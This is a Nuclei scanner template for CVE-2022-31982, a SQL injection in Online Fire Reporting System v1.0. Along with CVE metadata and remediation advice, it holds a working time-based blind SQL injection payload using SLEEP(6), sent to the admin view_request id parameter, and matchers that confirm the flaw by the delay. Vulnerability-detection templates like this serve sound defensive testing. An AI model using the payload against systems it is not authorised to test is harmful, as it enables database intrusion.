43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: CVE-2022-31982
|
|
|
|
info:
|
|
name: Online Fire Reporting System v1.0 - SQL injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
|
|
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-31982
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00609
|
|
epss-percentile: 0.76231
|
|
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: online_fire_reporting_system_project
|
|
product: online_fire_reporting_system
|
|
tags: cve,cve2022,sqli,online-fire-reporting
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "Request Detail")'
|
|
condition: and
|
|
# digest: 490a00463044022021d94644085035941364ae87bfbf996ffacdbb8941a1bd29bf5f43fe277fb1e502203fdcab1d0942aff20114e51f347057f3c9d4a12a80ab378706f96c7ef99b46f4:922c64590222798bb761d5b6d8e72950 |